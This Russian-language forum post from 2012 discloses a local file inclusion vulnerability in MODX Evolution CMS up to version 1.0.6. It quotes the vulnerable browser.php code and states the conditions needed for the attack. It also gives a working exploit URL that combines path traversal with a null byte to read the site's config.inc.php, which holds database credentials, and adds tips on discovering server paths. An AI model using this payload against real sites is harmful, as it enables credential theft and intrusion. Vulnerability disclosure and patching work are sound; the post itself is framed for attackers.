Показать сообщение отдельно
Старый 27.07.2012, 00:19   #4
Agel_Nash
 
Аватар для Agel_Nash
 
Регистрация: 24.07.2012
Сообщений: 30
Репутация: 18
По умолчанию LFI в browser.php (only php 5.2)

Модераторы, переименуйте тему. Поторопился и забыл указать к какому движку относится уязвимость.

LFI в modx cms(smf) только ветка EVO <= 1.0.6
Условия: mq=off и php<5.3.4

manager/media/browser/mcpuk/browser.php
PHP код:
define('MODX_BASE_PATH'realpath('../../../../'));
$rb = new FBROWSER();
$ph = array();
$ph['seturl_js'] = $rb->seturl_js();
$output $rb->render_fbrowser($ph);
echo 
$output;
class 
FBROWSER
{
    function 
seturl_js()
    {
        
$seturl_js_filename 'seturl_js_'  htmlspecialchars($_GET['editor']) . '.inc';
        
$seturl_js_path MODX_BASE_PATH 'assets/plugins/';
        if(
file_exists($seturl_js_path $seturl_js_filename))
        {
            
$result file_get_contents($seturl_js_path $seturl_js_filename);
        }
        else
        {
            
/*...............*/
        
}
        return 
$result;
    } 
Примечательно, что такой мегакритичный баг живет уже давно в этом движке. (хотя наверное в приватах давно знают об этом баге).

Цитата:
Сообщение от Example
http://example.com/manager/media/browser/mcpuk/browser.php?editor=/../../../docs/manager/includes/config.inc.php%00
Как можно заметить, мы выходим чуть выше директории в которой находится сайт. Поэтому нужно узнать пути. Благо способов море: 1, 2, 3, ...

P.S. Записал небольшое видео для демонстрации http://www.youtube.com/watch?v=RbTLLOd55So
__________________
Я - вильгельм заколебатель

Последний раз редактировалось Agel_Nash; 27.07.2012 в 09:58..
Agel_Nash вне форума   Ответить с цитированием